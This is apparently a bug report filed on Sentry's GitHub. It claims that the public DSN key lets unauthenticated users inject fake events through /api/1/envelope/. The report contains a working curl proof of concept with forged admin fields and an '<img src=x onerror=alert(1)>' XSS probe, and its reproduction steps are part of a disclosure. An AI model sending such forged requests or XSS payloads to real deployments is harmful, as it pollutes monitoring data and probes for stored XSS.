π Bug Report: Unauthenticated Event Injection in /api/1/envelope/ Causes Fake Issues in DashboardΒ #101141
Description
Environment
SaaS (https://sentry.io/)
Steps to Reproduce
- Open the public Sentry login page at: https://xxxx/auth/login/sentry/
- Open browser DevTools β Network tab
- Find a POST request to:
/api/1/envelope/?sentry_key=... - Extract the
sentry_keyfrom the URL (visible even without authentication) - Craft a POST request like below using
curlor Burp Suite:
curl -X POST 'https://.xxxx/api/1/envelope/?sentry_version=7&sentry_key=<exposed-key>' \
-H 'Content-Type: text/plain;charset=UTF-8' \
--data-binary $'{"event_id":"1234567890abcdef1234567890abcdef","sent_at":"2025-10-08T07:00:00Z","sdk":{"name":"sentry.javascript.react","version":"10.11.0"}}\n{"type":"event"}\n{"timestamp":"2025-10-08T07:00:00Z","platform":"javascript","message":"Unauthenticated fake injection","user":{"username":"attacker","isadmin":true},"tags":{"role":"admin"},"extra":{"alert":"<img src=x onerror=alert(1)>"} }'
### Expected Result
```markdown
Only authenticated and trusted clients should be able to submit events that generate issues in the dashboard.
`/api/1/envelope/` should:
- Validate DSN + origin
- Reject unauthenticated requests
- Sanitize unknown fields (like `isadmin`, `alert`)
- Not accept forged log data that leads to security bypass or UI injection
### Actual Result
- Any unauthenticated user can extract the public DSN just by visiting the login page
- That DSN allows direct POST to `/api/1/envelope/` without authentication
- Events are accepted and processed, showing up as real issues in the dashboard
- No checks on fields like `user.isadmin`, `tags.role`, `extra.alert`
- Potential for stored XSS via unescaped values in `extra.alert`
### Product Area
APIs
### Link
_No response_
### DSN
_No response_
### Version
25.9.0 - 8c4f6a7